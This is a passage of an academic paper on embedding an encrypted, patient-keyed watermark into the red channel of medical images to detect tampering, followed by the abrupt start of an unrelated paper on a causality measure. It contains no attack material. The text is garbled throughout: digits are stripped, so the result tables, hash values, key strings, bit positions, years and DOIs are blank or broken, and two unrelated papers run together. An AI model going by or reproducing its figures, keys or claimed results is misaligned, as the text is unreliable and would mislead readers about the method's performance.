system are robust in watermarking techniques against the attacks. on the other hand, the hsv is not robust in the embedding of the digital watermark. in ahvanooey et al. ( ), to make the trace unnoticeable to the readers an invisible watermark is embedded in a cover text. also, an instance-based learning algorithm is used to mark all the words of the original text. the result shows that the proposed algorithm has a higher performance compared with the existing codes. on the other hand, the algorithm uses the traditional way of embedding watermark. to summarize the findings from the existing works, spatial watermarking has the advantage of being simple implementation and low complexity and on the other hand, it is not efficient against the attacks. all the existing algorithms rely on one strategy that is the separation of the original image into the region of interest and region of non-interest. the efficiency of the algorithms depends on their ability to recover the watermark from the image. in some algorithms, the rectangular shape of the image is a must. this work is an extension to nagm & safy ( ) but the steganography process is carried out in the spatial domain. through this work, we tried to prove the effectiveness of the proposed watermark in the face of the intentional alteration of patient data not only in the frequency domain but also in the spatial domain. proposed methodology from all the above-mentioned purposes, a hybrid spatial domain watermarking scheme is proposed that meets the requirements of the medical imaging authentication. the big difference between the proposed code and the above-mentioned researches is the distribution of the watermark. the watermark is distributed at every pixel in the image includes the region of interest and region of non-interest. 
although the watermark touches every pixel, the code still satisfies the payload requirements because the change represents only / of each pixel, depending on the location of the selected bit. another difference is that the target of the algorithm is to preserve the watermark and the patient image simultaneously, unlike other algorithms whose most important goal is to extract the embedded watermark. the whole structure of the proposed algorithm is shown in fig. . figure: proposed approach of embedding digital watermarking into medical images. the whole structure of the proposed algorithm is summarized below:
step 1. read the input rgb color image:
$$I = I(r,c) = \begin{bmatrix} i_{11} & \cdots & i_{1m} \\ \vdots & \ddots & \vdots \\ i_{n1} & \cdots & i_{nm} \end{bmatrix}$$
step 2. a color filter array is used to decompose the image into its three components:
$$G(r,c) = \begin{bmatrix} g_{11} & \cdots & g_{1m} \\ \vdots & \ddots & \vdots \\ g_{n1} & \cdots & g_{nm} \end{bmatrix},\qquad R(r,c) = \begin{bmatrix} r_{11} & \cdots & r_{1m} \\ \vdots & \ddots & \vdots \\ r_{n1} & \cdots & r_{nm} \end{bmatrix},\qquad B(r,c) = \begin{bmatrix} b_{11} & \cdots & b_{1m} \\ \vdots & \ddots & \vdots \\ b_{n1} & \cdots & b_{nm} \end{bmatrix}$$
step 3. the separated components are resized so that they are suitable for the encryption process: when the number of rows is not an exact multiple of the cipher block size $b$, the rows are padded, $R_m(r) = R\bigl(r + (b - r \bmod b)\bigr)$ if $r \bmod b \neq 0$, otherwise $R_m(r) = R(r)$; the columns are handled analogously, $R_m(c) = R\bigl(c + (b - c \bmod b)\bigr)$ if $c \bmod b \neq 0$, otherwise $R_m(c) = R(c)$.
step 4. the blue component is selected as the pre-modifier component.
step 5. the red component is called the modified component, and the blue component (the pre-modifier component) is encrypted using the dynamic-key approach: the arrival date, the name, the patient id, and any other information related to the patient are combined, and sha- is used to get the initial key for the symmetric encryption process. the initial hash values are h( ) = " ", h( ) = "fcdab ", h( ) = " badcfe", h( ) = " ", h( ) = "c d e f ", and $K = \mathrm{SHA}(\text{patient data})$ = "e c db fc ef adeb e d d". the initial key for the encryption process is the first digits of this output. the ciphered blue component of the original color image is denoted cb and is produced with the key k = "e c db ", the internal key, and the round configuration:
$$CB(r,c) = \mathrm{AES}\bigl(K,\; B_m(r,c)\bigr) = \begin{bmatrix} cb_{11} & \cdots & cb_{1m} \\ \vdots & \ddots & \vdots \\ cb_{n1} & \cdots & cb_{nm} \end{bmatrix}$$
step 6. after the encryption is carried out, the new blue component is called the modifier component.
step 7. to get the final modified component, a spatial-domain substitution is carried out between the modified component and the modifier component, $NRM(r,c) = NRM_{rc}\bigl(CB_{rc}\bigr)$, producing the matrix of values $nrm_{11}, \ldots, nrm_{nm}$ from the corresponding $cb_{11}, \ldots, cb_{nm}$.
step 8. the substitution is carried out between one of the least significant bits, bit number # and bit number #, of the red component and the same bit of the ciphered blue component, according to ( , , and ), to get the final modified component. writing a pixel of the modified component msb-first as the bit vector $[b_8, b_7, \ldots, b_1]$, the selected bit plane is replaced by the corresponding bit of cb; for the lsb variant,
$$NRM(r,c) = [\,b_8,\; b_7,\; b_6,\; b_5,\; b_4,\; b_3,\; b_2,\; b_1(CB)\,]$$
and in the other two variants one of the two higher bit planes named above is replaced instead.
step 9. the original blue and green components, together with the final modified component, are used to compose the final secured image according to ( ), where ni is the protected image:
$$NI(r,c) = \bigl\{\, NRM(r,c),\; G_m(r,c),\; B_m(r,c) \,\bigr\}$$
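as a reading aid, the following python sketch mirrors the flow of the steps above under stated assumptions. it is not the authors' matlab implementation: the use of sha-256 over the concatenated patient fields, aes-128 in ecb mode over the padded blue plane, the pycryptodome library, and the choice of which bit plane (`bit`) is replaced are illustrative assumptions standing in for details that are elided in the text above.

```python
# illustrative sketch of the embedding pipeline above (not the authors' matlab code).
# assumptions: 8-bit rgb input, sha-256 over the joined patient fields, aes-128/ecb
# over the padded blue plane, and pycryptodome providing the aes primitive.
import hashlib
import numpy as np
from Crypto.Cipher import AES

def derive_key(patient_fields):
    """step 5 (assumed form): hash the combined patient metadata; first 16 bytes = aes key."""
    digest = hashlib.sha256("|".join(patient_fields).encode("utf-8")).digest()
    return digest[:16]

def pad_to_block(plane, block=16):
    """step 3: pad rows/columns so each dimension is a multiple of the cipher block size."""
    extra_r = (-plane.shape[0]) % block
    extra_c = (-plane.shape[1]) % block
    return np.pad(plane, ((0, extra_r), (0, extra_c)), mode="edge")

def encrypt_plane(plane, key):
    """steps 5-6: encrypt the padded blue plane to obtain the modifier component cb."""
    padded = pad_to_block(plane).astype(np.uint8)
    cipher = AES.new(key, AES.MODE_ECB)              # mode chosen for the sketch only
    cb = np.frombuffer(cipher.encrypt(padded.tobytes()), dtype=np.uint8).reshape(padded.shape)
    return cb[:plane.shape[0], :plane.shape[1]]      # crop back to the original size

def embed(image_rgb, patient_fields, bit=0):
    """steps 7-9: replace the chosen bit plane of the red component with the same bit of cb."""
    red, green, blue = (image_rgb[..., i].copy() for i in range(3))
    cb_bit = (encrypt_plane(blue, derive_key(patient_fields)) >> bit) & 1
    red = (red & ~np.uint8(1 << bit)) | (cb_bit << bit).astype(np.uint8)
    return np.dstack([red, green, blue])             # ni: green and blue stay untouched
```

in such a design, verification can reverse the last step: recompute cb from the received blue plane and the patient record and compare the selected bit plane of the received red component against it; a mismatch indicates that the pixel was altered after embedding.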
implementation and experimental results: in the experiment, matlab version . . . running on a core i processor at . ghz with gb ram is used as the test platform. in figs. – , randomly selected medical images are used as the original images for performance evaluation, and the parameters have been calculated as follows. embedding capacity: although there is a watermark in every pixel of the image, it represents / of the pixel and does not affect the quality of the image. image distortion: to assess the image distortion, the mse, mae, structural similarity index (ssim), and universal image quality index (uiqi) are used. the mean squared error (mse) is calculated by averaging the squared intensity differences between the watermarked image and the reference image pixels. the ssim is calculated by normalizing the mean value of structural similarity between the original image and the watermarked one. the uiqi models any distortion of the image as a combination of luminance distortion, contrast distortion, and loss of correlation. (a short numerical sketch of these metrics is given after the figure captions below.)
$$\mathrm{MSE} = \frac{1}{M \times N}\sum_{i=1}^{M}\sum_{j=1}^{N}\bigl[X(i,j) - V(i,j)\bigr]^{2}$$
$$\mathrm{MAE} = \frac{1}{N}\sum_{i=1}^{N}\lvert x_i - v_i \rvert$$
$$\mathrm{SSIM}(x,v) = \frac{(2\,\mu_x \mu_v + c_1)\,(2\,\sigma_{xv} + c_2)}{(\mu_x^{2} + \mu_v^{2} + c_1)\,(\sigma_x^{2} + \sigma_v^{2} + c_2)}$$
$$Q = \frac{\sigma_{xv}}{\sigma_x \sigma_v}\cdot\frac{2\,\mu_x \mu_v}{\mu_x^{2} + \mu_v^{2}}\cdot\frac{2\,\sigma_x \sigma_v}{\sigma_x^{2} + \sigma_v^{2}}$$
tables and show that the mean absolute error and mean square error of the single lsb are the lowest compared with the other elements. figure: digital watermarking using different strategies for the ab image. (a) ab image without digital watermark; (b) ab watermarked by lsb; (c) ab watermarked by bit sb; (d) ab watermarked by bit sb. figure: digital watermarking using different strategies for the ac image. (a) ac image without digital watermark; (b) ac watermarked by lsb; (c) ac watermarked by bit sb; (d) ac watermarked by bit sb. figure: digital watermarking using different strategies for the flu image. (a) flu image without digital watermark; (b) flu watermarked by lsb; (c) flu watermarked by bit sb; (d) flu watermarked by bit sb. figure: digital watermarking using different strategies for the aa image. (a) aa image without digital watermark; (b) aa watermarked by lsb; (c) aa watermarked by bit sb; (d) aa watermarked by bit sb. table shows that the structural similarity index of the single lsb and the single-bit sb is the highest compared with the single-bit sb, and table shows that the proposed approach has a high entropy value for all elements. figure: digital watermarking using different strategies for the thr image. (a) thr image without digital watermark; (b) thr watermarked by lsb; (c) thr watermarked by bit sb; (d) thr watermarked by bit sb.
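the metric definitions above can be exercised with a few lines of numpy; the snippet below is an illustrative sketch using the global, single-window forms of ssim and uiqi exactly as printed (not the windowed variants and not the authors' evaluation code), with c1 and c2 set to the usual 8-bit stabilizing constants.

```python
# numpy sketch of the distortion metrics as printed above (global, single-window forms).
import numpy as np

def mse(x, v):
    x, v = x.astype(np.float64), v.astype(np.float64)
    return np.mean((x - v) ** 2)

def mae(x, v):
    return np.mean(np.abs(x.astype(np.float64) - v.astype(np.float64)))

def ssim_global(x, v, c1=(0.01 * 255) ** 2, c2=(0.03 * 255) ** 2):
    x, v = x.astype(np.float64), v.astype(np.float64)
    mx, mv = x.mean(), v.mean()
    cov = ((x - mx) * (v - mv)).mean()
    return ((2 * mx * mv + c1) * (2 * cov + c2)) / \
           ((mx ** 2 + mv ** 2 + c1) * (x.var() + v.var() + c2))

def uiqi(x, v):
    x, v = x.astype(np.float64), v.astype(np.float64)
    mx, mv = x.mean(), v.mean()
    sx, sv = x.std(), v.std()
    cov = ((x - mx) * (v - mv)).mean()
    return (cov / (sx * sv)) * (2 * mx * mv / (mx ** 2 + mv ** 2)) * \
           (2 * sx * sv / (sx ** 2 + sv ** 2))
```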
figure: digital watermarking using different strategies for the gastro image. (a) gastro image without digital watermark; (b) gastro watermarked by lsb; (c) gastro watermarked by bit sb; (d) gastro watermarked by bit sb.
table: the mean absolute error of the proposed approach.
images/size/jpeg | single-lsb | single-bit sb | single-bit sb
thr / * , . kb | . | . | .
aa / * , . kb | . | . | .
ab / * , kb | . | . | .
ac / * , kb | . | . | .
flu / * , kb | . | . | .
gastro / * , . kb | . | . | .
security of the watermark: the patient id and any information related to the patient are combined using the dynamic keys, and sha- is used to get the initial key for the symmetric encryption process. the key is dynamic and depends on the patient information, which makes it easier to detect intentional changes.
table: the mean square error of the proposed approach.
images/size/jpeg | single-lsb | single-bit sb | single-bit sb
thr / * , . kb | . | . | .
aa / * , . kb | . | . | .
ab / * , kb | . | . | .
ac / * , kb | . | . | .
flu / * , kb | . | . | .
gastro / * , . kb | . | . | .
table: the ssim for the proposed approach.
images/size/jpeg | single-lsb | single-bit sb | single-bit sb
thr / * , . kb | . | . | .
aa / * , . kb | . | . | .
ab / * , kb | . | . | .
ac / * , kb | . | . | .
flu / * , kb | . | . | .
gastro / * , . kb | . | . | .
table: the uiqi for the proposed approach.
images/size/jpeg | single-lsb | single-bit sb | single-bit sb
thr / * , . kb | . | . | .
aa / * , . kb | . | . | .
ab / * , kb | . | . | .
ac / * , kb | . | . | .
flu / * , kb | . | . | .
gastro / * , . kb | . | . | .
invisibility evaluation: the psnr between the watermarked image and the original image is used to evaluate the visual quality,
$$\mathrm{PSNR} = 10\,\log_{10}\!\left(\frac{s^{2}}{\mathrm{MSE}}\right)$$
where s is the maximum pixel value (a small numerical sketch follows the tables below). table shows that the single-lsb has a better result compared with the single-bit sb and the single-bit sb, and table shows the peak signal to noise ratio of some of the existing approaches; the results show that the psnr of the proposed approach is better than that of the tested approaches.
comparison results: compared with the existing work, the created code is distributed at every pixel of the cover medical image and not only in the regions of non-interest pixels, while the image details are still preserved; most existing watermarks are embedded in the regions of non-interest, which facilitates the attacking process. the proposed algorithm succeeded in determining intentional changes in the patient image up to * pixels. there is a big difference between the proposed model and the existing models: the performance of the existing approaches is measured by their ability to extract the watermark from the original image, whereas the proposed approach preserves the watermark and the original image at the same time. this difference gives the proposed model the advantage of discovering the attacks that the images may be exposed to, because the proposed method creates the watermark from one of the components of the original image and not by adding a watermark image to the image.
table: the peak signal to noise ratio of the proposed approach.
images/size/jpeg | single-lsb | single-bit sb | single-bit sb
thr / * , . kb | . | . | .
aa / * , . kb | . | . | .
ab / * , kb | . | . | .
ac / * , kb | . | . | .
flu / * , kb | . | . | .
gastro / * , . kb | . | . | .
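the psnr form above is likewise easy to check numerically; the helper below is illustrative only, not the authors' code, and assumes 8-bit images so that the peak value s is 255.

```python
# psnr in the form given above; assumes 8-bit images (s = 255).
import numpy as np

def psnr(original, watermarked, s=255.0):
    err = np.mean((original.astype(np.float64) - watermarked.astype(np.float64)) ** 2)
    return float("inf") if err == 0 else 10.0 * np.log10((s * s) / err)
```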
table: the peak signal to noise ratio of some of the existing approaches.
techniques | psnr (db)
alattar ( ) | .
shih & wu ( ) | .
thodi & rodríguez ( ) | .
zhao et al. ( ) | .
wang, lee & chang ( ) | .
shih & zhong ( ) | .
bamal & kasana ( ) | .
as noted above, the proposed method creates the watermark from one of the components of the original image and not by adding a watermark image to the image.
discussions: this subsection discusses the proposed algorithm in various aspects such as authenticity and integrity, and prevention against intentional attacks.
authenticity and integrity: authenticity and security are the most significant requirements for medical image protection, because any deliberate change of the image can lead to a wrong decision by the physician. figure demonstrates how the proposed algorithm detects the attacks. the vulnerability assessment approach is based on assuming intentional changes in the patient image up to * pixels, and the evaluation also includes changes between the color components. figures – demonstrate different attack regions, and all of them are detected by the proposed algorithm. table shows the ability of the proposed algorithm to detect the intentional attacks. from the image quality point of view, it is clear that the choice of the single lsb gives the best image quality among the tested elements, with the single-bit sb in second rank. regarding the ability to detect intentional attacks, the proposed algorithm succeeded in determining intentional changes in the patient image up to * pixels, especially in the case of the single-bit sb.
future work: the aim of embedding the watermark is to preserve the medical images from any intentional or unintended interference. therefore, in the future we will try to find different methods to achieve this goal, and we propose the following:
1. to protect the blockchain record, a new idea will be proposed based on the combination of watermarking, the qr code, and the interplanetary file system (ipfs).
2. use of word embedding (smith, ) to create an efficient watermark. word embedding is one of the important developments in natural language processing; its key benefit is that, by preserving the semantic similarity of words and constructing a low-dimensional vector, it allows a more expressive and effective representation.
3. t-sne dimensionality reduction (heuer, ) can be used to compare the original image with the watermarked image and can help in the extraction of the watermark.
4. the amount of cybersecurity data generated in the form of unstructured texts (simran et al., ), such as social media tools, blogs, and posts, has increased remarkably in recent years. named entity recognition (ner) is an initial step in converting this unstructured data into structured data that many applications may use. such unstructured texts could be used to create a watermark that is difficult for deliberate attacks that alter patients' information to defeat.
figure: proposed approach for forgery detection of medical images. (an illustrative sketch of the corresponding tamper check follows below.)
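to make the detection idea concrete, the following python sketch shows one way to perform the check described above. it reuses the assumed `derive_key` and `encrypt_plane` helpers from the embedding sketch earlier; the block size, threshold, and bit plane are parameters introduced for the example rather than values taken from the paper.

```python
# hedged sketch of the tamper check: recompute cb from the received blue plane and the
# patient record, compare the embedded bit plane of the red component against it, and
# report the blocks that contain mismatches (i.e., likely tampered regions).
import numpy as np

def detect_tampering(protected_rgb, patient_fields, bit=0, block=8, threshold=0.0):
    red, blue = protected_rgb[..., 0], protected_rgb[..., 2]
    expected = (encrypt_plane(blue, derive_key(patient_fields)) >> bit) & 1
    embedded = (red >> bit) & 1
    mismatch = (expected != embedded)
    suspicious = []
    h, w = mismatch.shape
    for r in range(0, h, block):
        for c in range(0, w, block):
            if mismatch[r:r + block, c:c + block].mean() > threshold:
                suspicious.append((r, c))        # top-left corner of a flagged block
    return suspicious
```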
/peerj-cs. https://peerj.com/computer-science/ figure the modification of the ab image. (a) the ab image is modified at red the by same blue component from raw – and column – (b) the ab image is modified in red by blue component at row from to and column – lsb. full-size doi: . /peerj-cs. /fig- figure the modification of the ac image. (a) the ac image is modified at blue the by same green component from raw – and column – (b) the ac image is modified in red component by at row from to and column – lsb. full-size doi: . /peerj-cs. /fig- figure the modification of the flu image. (a) the flu image is modified at blue by green component at row from to and column – (b) the flu image is modified at red by the same blue component at row from to and column – . full-size doi: . /peerj-cs. /fig- figure the modification of the gastro image. (a) the gastro image is modified at red component by in raw – and column – (b) the gastro image is modified in red by blue component at row from to and column – lsb. full-size doi: . /peerj-cs. /fig- nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions in this article, a robust spatial watermarking algorithm for medical images has been proposed. this new approach to maintain high data security combines integrity protection, encryption algorithms, and steganography techniques. the performance of the proposed algorithm is evaluated for the desired outcome is obtained without significant degradation in the extracted covered image and the ability of the code against the intentional destruction of the medical image. the proposed approach has the following advantages: � the processed images have the same size as input images. � the proposed approach is valid for all the image shapes and not only for the rectangular shape as in many of the existing works. � the approach applies to every rgb images. � the created secret code has dynamic properties based on:-imaging device manufacturers. -basic components of color images (r, g, and b). � its advantage over the other approaches is that the created code is distributed at every pixel of the cover medical image and not only in the regions of non-interest pixels (roni). � although the digital watermark is distributed on every pixel on the image the code does not affect the output image quality. � the encryption of watermarks uses hash function properties, which are extremely sensitive to the initial value, to enhance the security of watermarks. � although there is a watermark in every pixel in the image, it represents / of the pixel, but it did not affect the quality of the image. � it solves the problem that exists in the spatial domain algorithms that cannot simultaneously offer protection against intentional attacks and robustness. � the proposed approach preserves the watermark and the original image at the same time. this is because the proposed method creates the watermark from one of the components of the original image and not by embedding a watermark image in the image. table the forgery detection rate. tampared block size to image (tbsi) % x “forgery detection rate (fdr) based on correlation between original image and tampared image” thr, ( * )/( * ) = . successful . aa, ( * )/( * ) = . successful . ab, ( * )/( * ) = . successful . ac( * )/( * ) = . successful . 
flu, ( * )/( * ) = . successful . gastro, ( * )/( * ) = . successful . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � ahmad nagm conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � mohammed safy elwan performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: matlab code is available as a supplemental file. publicly available data located at mendeley: ali, sharib; zhou, felix; daul, christian; braden, barbara; bailey, adam; east, james; realdon, stefano; georges, wagnieres; loshchenov, maxim; blondel, walter; grisan, enrico; rittscher, jens ( ), “endoscopy artefact detection (ead) dataset”, mendeley data, v , doi . /c fjbxcgj . . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahvanooey mt, li q, zhu x, alazab m, zhang j. . anitw: a novel intelligent text watermarking technique for forensic identification of spurious information on social media. computers & security ( ): doi . /j.cose. . . al-afandy ka, el-shafai w, el-rabaie e-sm, abd el-samie fe, faragallah os, el-mhalaway a, shehata am, el-banby gm, el-halawany mm. . robust hybrid watermarking techniques for different color imaging systems. multimedia tools and applications ( ): – . alattar am. . reversible watermark using the difference expansion of a generalized integer transform. ieee transactions on image processing ( ): – doi . /tip. . . allaert fa, dusserre l. . security of health information system in france: what we do will no longer be different from what we tell. international journal of bio-medical computing : – . armoni a. . the use of artificial intelligence techniques and applications in the medical domain. in: healthcare information systems: challenges of the new millennium. pennsylvania: igi global, – . bamal r, kasana ss. . slantlet based hybrid watermarking technique for medical images. multimedia tools and applications ( ): – doi . /s - - - . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://dx.doi.org/ . /c fjbxcgj . http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cose. . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hernández jr, perez-gonzalez f, rodriguez jm. . the impact of channel coding on the performance of spatial watermarking for copyright protection. in: proceedings of the ieee international conference on acoustics, speech and signal processing, icassp' (cat. no. ch ). vol. . piscataway: ieee, – . heuer h. . text comparison using word vector representations and dimensionality reduction. arxiv. available at http://arxiv.org/abs/ . . huang h-c, pan js, wang fh. . genetic watermarking on transform domain. in: pan js, huang h-c, jain lc, eds. intelligent watermarking techniques, ch. . singapore: world scientific, – . 
jennett p, watanabe m, igras e, premkumar k, hall w. . telemedicine and security. confidentiality, integrity, and availability: a canadian perspective. studies in health technology and informatics : – . katsikas s. . information systems security: facing the information society of the st century. new york: springer. langelaar gc, setyawan i, lagendijk rl. . watermarking digital image and video data: a state-of-the-art overview. ieee signal processing magazine ( ): – doi . / . . memon na, chaudhry a, ahmad m, keerio za. . hybrid watermarking of medical images for roi authentication and recovery. international journal of computer mathematics ( ): – . memon na, gilani sam. . watermarking of chest ct scan medical images for content authentication. international journal of computer mathematics ( ): – doi . / . mousavi sm, naghsh a, abu-bakar sar. . watermarking techniques used in medical images: a survey. journal of digital imaging ( ): – doi . /s - - - . nagm a, safy m. . a robust watermarking algorithm for medical images. indonesian journal of electrical engineering and computer science ( ): doi . /ijeecs.v .i .pp - . nagm a, torky m, ghazala mma, sayed hef. . image protection against forgery and pixel tampering based on a triple hybrid security approach. in: international conference on advanced intelligent systems and informatics. cham: springer, – . nagm am, torky m, youssef ky. . a novel watermarking approach for protecting image integrity based on a hybrid security technique. international journal of computer applications ( - ) ( ): – . nyeem h, boles w, boyd c. . a review of medical image watermarking requirements for teleradiology. journal of digital imaging ( ): – doi . /s - - -x. pan w, coatrieux g, cuppens-boulahia n, cuppens f, roux c. . medical image integrity control combining digital signature and lossless watermarking. in: data privacy management and autonomous spontaneous security. berlin: springer, – . pan js, huang hc, jain lc. . intelligent watermarking techniques. vol. . singapore: world scientific. priya s, santhi b, swaminathan p. . image watermarking techniques-a review. research journal of applied sciences, engineering and technology ( ): – . rao nv, kumari vm. . watermarking in medical imaging for security and authentication. information security journal: a global perspective ( ): – doi . / . . . nagm and safy elwan ( ), peerj comput. sci., doi . /peerj-cs. / http://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ijeecs.v .i .pp - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ savakar dg, ghuli a. . robust invisible digital image watermarking using hybrid scheme. arabian journal for science and engineering ( ): – doi . /s - - - . shih fy, wu yt. . robust watermarking and compression for medical images based on genetic algorithms. information sciences ( ): – doi . /j.ins. . . . shih fy, zhong x. . high-capacity multiple regions of interest watermarking for medical images. information sciences ( ): – doi . /j.ins. . . . simran k, sriram s, vinayakumar r, soman kp. . deep learning approach for intelligent named entity recognition of cyber security. in: international symposium on signal processing and intelligent recognition systems. singapore: springer, – . smith na. . contextual word representations: a contextual introduction. arxiv. available at http://arxiv.org/abs/ . . 
swarna priya rm, maddikunta pkr, parimala m, koppu s, gadekallu tr, chowdhary cl, alazab m. . an effective feature engineering for dnn using hybrid pca-gwo for intrusion detection in iomt architecture. computer communications. thodi dm, rodríguez jj. . expansion embedding techniques for reversible watermarking. ieee transactions on image processing ( ): – doi . /tip. . . tirkel az, rankin ga, van schyndel rm, ho wj, mee nra, osborne cf. . electronic watermark. in: digital image computing, technology and applications (dicta' ). – . van schyndel rg, tirkel az, osborne cf. . a digital watermark. in: proceedings of st international conference on image processing. – november , austin, tx, usa. vol. . piscataway: ieee, – . viswanathan p, venkata krishna p. . fusion of cryptographic watermarking medical image system with reversible property. in: international conference on information processing. berlin: springer, – . voyatzis g, pitas i. . chaotic watermarks for embedding in the spatial digital image domain. in: proceedings international conference on image processing. icip (cat. no. cb ). piscataway: ieee, – . wakatani a. . digital watermarking for roi medical images by using compressed signature images. in: proceedings of the th annual hawaii international conference on system sciences. piscataway: ieee, – . wang zh, lee cf, chang cy. . histogram-shifting-imitated reversible data hiding. journal of systems and software ( ): – doi . /j.jss. . . . wolfgang rb, delp ej iii. . overview of image security techniques with applications in multimedia systems. in: multimedia networks: security, displays, terminals, and gateways. vol. . bellingham: international society for optics and photonics, – . zain jm, clarke m. . reversible region of non-interest (roni) watermarking for authentication of dicom images. arxiv. available at http://arxiv.org/abs/ . . zhang x, wang s. . fragile watermarking scheme using a hierarchical mechanism. signal processing ( ): – . zhao z, luo h, lu z-m, pan j-s. . reversible data hiding based on multilevel histogram modification and sequential recovery. aeu-international journal of electronics and communications ( ): – doi . /j.aeue. . . .
submitted december accepted april published may corresponding author aditi kathpalia, kathpaliaaditi@gmail.com academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright kathpalia et al.
distributed under creative commons cc-by . open access data-based intervention approach for complexity-causality measure aditi kathpalia and nithin nagaraj consciousness studies programme, national institute of advanced studies, bengaluru, karnataka, india abstract causality testing methods are being widely used in various disciplines of science. model-free methods for causality estimation are very useful, as the underlying model generating the data is often unknown. however, existing model-free/data-driven measures assume separability of cause and effect at the level of individual samples of measurements and unlike model-based methods do not perform any intervention to learn causal relationships. these measures can thus only capture causality which is by the associational occurrence of ‘cause’ and ‘effect’ between well separated samples. in real-world processes, often ‘cause’ and ‘effect’ are inherently inseparable or become inseparable in the acquired measurements. we propose a novel measure that uses an adaptive interventional scheme to capture causality which is not merely associational. the scheme is based on characterizing complexities associated with the dynamical evolution of processes on short windows of measurements. the formulated measure, compression-complexity causality is rigorously tested on simulated and real datasets and its performance is compared with that of existing measures such as granger causality and transfer entropy. the proposed measure is robust to the presence of noise, long-term memory, filtering and decimation, low temporal resolution (including aliasing), non-uniform sampling, finite length signals and presence of common driving variables. our measure outperforms existing state-of-the-art measures, establishing itself as an effective tool for causality testing in real world applications. subjects adaptive and self-organizing systems, data science, scientific computing and simulation keywords causality, causal inference, intervention, compression-complexity, model-based, dynamical complexity, negative causality introduction the ‘ladder of causation’ very rightly arranges hierarchically the abilities of a causal learner (pearl & mackenzie, ). the three levels proposed are: . association, . intervention and . counterfactuals, when arranged from the lower rung to the higher rung. currently, causality learning and inferring algorithms using only data are still stuck at the lowermost rung of ‘association’. measures such as granger causality (gc) (granger, ) and its various modifications (dhamala, rangarajan & ding, ; marinazzo, pellicoro & stramaglia, ), as well as, transfer entropy (te) (schreiber, ) that are widely being used across various disciplines of science—neuroscience (seth, barrett & barnett, ; vicente et al., ), climatology (stips et al., ; mosedale et al., ), econometrics (hiemstra & how to cite this article kathpalia a, nagaraj n. . data-based intervention approach for complexity-causality measure. peerj com- put. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:\unskip \penalty -\@m kathpaliaaditi@gmail.com mailto:\unskip \penalty -\@m kathpaliaaditi@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. jones, ; chiou-wei, chen & zhu, ), engineering (bauer et al., ) etc. are largely ‘model-free’/ ‘data-driven’ measures of causality. 
they make minimal assumptions about the underlying physical mechanisms and depend more on time series characteristics (seth, barrett & barnett, ). hence, they have a wider scope compared to specific model assumptions made by methods such as dynamic causal modelling (friston, harrison & penny, ) and structural equation modeling (pearl, ). however, the assumptions made by these methods are often ignored in practice, resulting in erroneous causality estimates on real world datasets. these measures can accurately quantify the degree of coupling between given time series only if assumptions (such as linearity, stationarity and presence of gaussian noise in case of gc and stationarity, markovian in case of te) are satisfied. thus, these methods, when correctly applied, can infer the presence of causality when it is by ‘association’ alone and not due to higher levels on the ladder of causation. to explain this better, consider a case where the ‘cause’ and ‘effect’ are inseparable. this can happen even when the time series satisfies stationarity but is non-markovian or in several instances when it is non-stationary. in fact, the stated assumptions are quite unlikely to be met in practice considering that acquired data are typically samples of continuous/discrete evolution of real world processes. these processes might be evolving at spatio-temporal scales very different from the scales of measurements. as a result, cause and effect may co-exist in a single measurement or overlap over blocks of measurements, making them inseparable. in such a scenario, it would be incorrect to estimate causality by means of correlations and/or joint probabilities which implicitly assumes the separability of ‘cause’ and ‘effect’. both gc and te make this assumption of separability. circularly, to characterize a time series sample as purely a ‘cause’ or an ‘effect’ is possible only if there is a clear linear/markovian separable relationship. when cause and effect are inseparable, ‘associational’ measures of causality such as gc and te are insufficient and we need a method to climb up the ladder of causation. intervention based approaches to causality rank higher than association. it involves not just observing regularities in the data but actively changing what is there and then observing its effect. in other words, we are asking the question—what will happen if we ‘do’ something? given only data and not the power to intervene on the experimental set up, intervention can only be done by building strong, accurate models. model-based causality testing measures, alluded to before, will fall in this category. they invert the model to obtain its various parameters, and then intervene to make predictions about situations for which data is unavailable. however, these methods are very domain specific and the models require specific knowledge about the data. with insufficient knowledge about the underlying model which generated the data, such methods are inapplicable. given only data that has already been acquired without any knowledge of its generating model or the power to intervene on the experimental/real-world setting, we can ask the question—what kind of intervention is possible (if at all) to infer causality? the proposed ‘interventional causality’ approach will not merely measure ‘associational causality’ because it does not make the assumption that the cause and its effect are present sample by sample (separable) as is done by existing model-free, data based methods of causality estimation. kathpalia et al. 
